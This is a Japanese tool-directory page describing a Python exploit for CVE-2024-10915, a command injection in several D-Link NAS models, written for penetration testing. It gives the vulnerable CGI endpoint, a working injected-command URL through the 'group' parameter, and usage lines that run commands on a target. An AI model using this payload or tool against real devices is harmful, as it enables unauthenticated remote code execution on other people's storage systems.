Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10915 — CVE-2024-10915に対応したPythonベースのエクスプロイト。D-Link NASデバイスにおけるコマンドインジェクションの脆弱性を悪用し、/cgi-bin/account_mgr.cgiエンドポイントを介して任意のシステムコマンドを実行します。認可されたセキュリティテスト用です。 | Kitploit
ツール/GitHubGitHub/r0otk3r/cve-2024-10915
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

CVE-2024-10915に対応したPythonベースのエクスプロイト。D-Link NASデバイスにおけるコマンドインジェクションの脆弱性を悪用し、/cgi-bin/account_mgr.cgiエンドポイントを介して任意のシステムコマンドを実行します。認可されたセキュリティテスト用です。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10915 - D-Link NAS コマンドインジェクションエクスプロイト

このPythonベースのエクスプロイトは、複数のD-Link NAS製品における/cgi-bin/account_mgr.cgi?cmd=cgi_user_addエンドポイントを介したコマンドインジェクションの脆弱性を標的としています。この脆弱性により、認証されていない攻撃者が影響を受けるデバイス上で任意のシステムコマンドを実行できる可能性があります。

説明

CVE-2024-10915は、複数のD-Link NASモデルに影響を与えます。攻撃者は、cgi_user_addコマンドのgroupパラメータを通じてコマンドを注入し、リモートコード実行を引き起こす可能性があります。

影響を受ける製品

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

脆弱なエンドポイント: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

例:

http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

必要条件

  • Python 3.x

  • requestsライブラリ

必要な依存関係をインストール:

pip3 install requests

使用方法

usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

オプション:

オプション説明
-u / --url対象のベースURL (例: http://192.168.1.100)
-c / --commandデバイス上で実行するコマンド (デフォルト: id)
-p / --proxyHTTPプロキシを使用 (例: http://127.0.0.1:8080)
-o / --outputHTTPレスポンスをファイルに保存
-l / --list影響を受けるD-Link NAS製品を一覧表示

例1

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

例2

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

例3

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ 免責事項

このプロジェクトは、教育目的および許可を得たテスト目的のみを意図しています。 明示的な許可がないネットワークやシステムでこのツールを使用しないでください。 著者は、誤用または損害に対して一切の責任を負いません。


公式チャンネル

  • YouTube @rootctf
  • X @r0otk3r
ツールをダウンロード